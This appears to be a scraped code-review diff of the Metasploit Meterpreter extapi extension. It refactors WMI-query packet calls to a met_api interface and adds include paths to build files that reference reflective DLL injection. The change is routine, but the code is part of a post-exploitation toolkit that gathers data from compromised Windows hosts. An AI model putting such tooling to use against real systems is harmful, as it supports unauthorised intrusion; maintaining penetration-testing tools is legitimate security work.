||||||
|
|
||||||
memset(fields, 0, sizeof(VARIANT*) * fieldCount);
|
memset(fields, 0, sizeof(VARIANT*) * fieldCount);
|
||||||
|
|
||||||
@ -337,14 +338,14 @@ DWORD wmi_query(LPCWSTR lpwRoot, LPWSTR lpwQuery, Packet* response)
|
|||||||
SafeArrayPtrOfIndex(pFieldArray, indices, (void**)&fields[i]);
|
SafeArrayPtrOfIndex(pFieldArray, indices, (void**)&fields[i]);
|
||||||
_bstr_t bstr(fields[i]->bstrVal);
|
_bstr_t bstr(fields[i]->bstrVal);
|
||||||
|
|
||||||
packet_add_tlv_string(fieldGroup, TLV_TYPE_EXT_WMI_FIELD, (const char*)bstr);
|
met_api->packet.add_tlv_string(fieldGroup, TLV_TYPE_EXT_WMI_FIELD, (const char*)bstr);
|
||||||
|
|
||||||
dprintf("[WMI] Added header field: %s", (const char*)bstr);
|
dprintf("[WMI] Added header field: %s", (const char*)bstr);
|
||||||
}
|
}
|
||||||
|
|
||||||
dprintf("[WMI] added all field headers");
|
dprintf("[WMI] added all field headers");
|
||||||
// add the field names to the packet
|
// add the field names to the packet
|
||||||
packet_add_group(response, TLV_TYPE_EXT_WMI_FIELDS, fieldGroup);
|
met_api->packet.add_group(response, TLV_TYPE_EXT_WMI_FIELDS, fieldGroup);
|
||||||
|
|
||||||
dprintf("[WMI] processing values...");
|
dprintf("[WMI] processing values...");
|
||||||
// with that horrible pain out of the way, let's actually grab the data
|
// with that horrible pain out of the way, let's actually grab the data
|
||||||
@ -356,7 +357,7 @@ DWORD wmi_query(LPCWSTR lpwRoot, LPWSTR lpwQuery, Packet* response)
|
|||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
Packet* valueGroup = packet_create_group();
|
Packet* valueGroup = met_api->packet.create_group();
|
||||||
|
|
||||||
for (LONG i = 0; i < fieldCount; ++i)
|
for (LONG i = 0; i < fieldCount; ++i)
|
||||||
{
|
{
|
||||||
@ -373,13 +374,13 @@ DWORD wmi_query(LPCWSTR lpwRoot, LPWSTR lpwQuery, Packet* response)
|
|||||||
variant_to_string(_variant_t(varValue), value, FIELD_SIZE);
|
variant_to_string(_variant_t(varValue), value, FIELD_SIZE);
|
||||||
}
|
}
|
||||||
|
|
||||||
packet_add_tlv_string(valueGroup, TLV_TYPE_EXT_WMI_VALUE, value);
|
met_api->packet.add_tlv_string(valueGroup, TLV_TYPE_EXT_WMI_VALUE, value);
|
||||||
|
|
||||||
dprintf("[WMI] Added value for %s: %s", (char*)_bstr_t(fields[i]->bstrVal), value);
|
dprintf("[WMI] Added value for %s: %s", (char*)_bstr_t(fields[i]->bstrVal), value);
|
||||||
}
|
}
|
||||||
|
|
||||||
// add the field values to the packet
|
// add the field values to the packet
|
||||||
packet_add_group(response, TLV_TYPE_EXT_WMI_VALUES, valueGroup);
|
met_api->packet.add_group(response, TLV_TYPE_EXT_WMI_VALUES, valueGroup);
|
||||||
|
|
||||||
pObj->Release();
|
pObj->Release();
|
||||||
pObj = NULL;
|
pObj = NULL;
|
||||||
@ -436,7 +437,7 @@ DWORD wmi_query(LPCWSTR lpwRoot, LPWSTR lpwQuery, Packet* response)
|
|||||||
_com_error comError(hResult);
|
_com_error comError(hResult);
|
||||||
_snprintf_s(errorMessage, 1024, 1023, "%s (0x%x)", comError.ErrorMessage(), hResult);
|
_snprintf_s(errorMessage, 1024, 1023, "%s (0x%x)", comError.ErrorMessage(), hResult);
|
||||||
dprintf("[WMI] returning error -> %s", errorMessage);
|
dprintf("[WMI] returning error -> %s", errorMessage);
|
||||||
packet_add_tlv_string(response, TLV_TYPE_EXT_WMI_ERROR, errorMessage);
|
met_api->packet.add_tlv_string(response, TLV_TYPE_EXT_WMI_ERROR, errorMessage);
|
||||||
hResult = S_OK;
|
hResult = S_OK;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@ -84,7 +84,7 @@
|
|||||||
<Optimization>MinSpace</Optimization>
|
<Optimization>MinSpace</Optimization>
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||||
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<StringPooling>true</StringPooling>
|
<StringPooling>true</StringPooling>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
@ -134,7 +134,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
|
|||||||
<Optimization>MinSpace</Optimization>
|
<Optimization>MinSpace</Optimization>
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||||
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<StringPooling>true</StringPooling>
|
<StringPooling>true</StringPooling>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
@ -187,7 +187,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
|
|||||||
<Optimization>MaxSpeed</Optimization>
|
<Optimization>MaxSpeed</Optimization>
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||||
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<StringPooling>true</StringPooling>
|
<StringPooling>true</StringPooling>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
@ -237,7 +237,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
|
|||||||
<Optimization>MaxSpeed</Optimization>
|
<Optimization>MaxSpeed</Optimization>
|
||||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||||
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\extapi;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_EXTAPI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<StringPooling>true</StringPooling>
|
<StringPooling>true</StringPooling>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user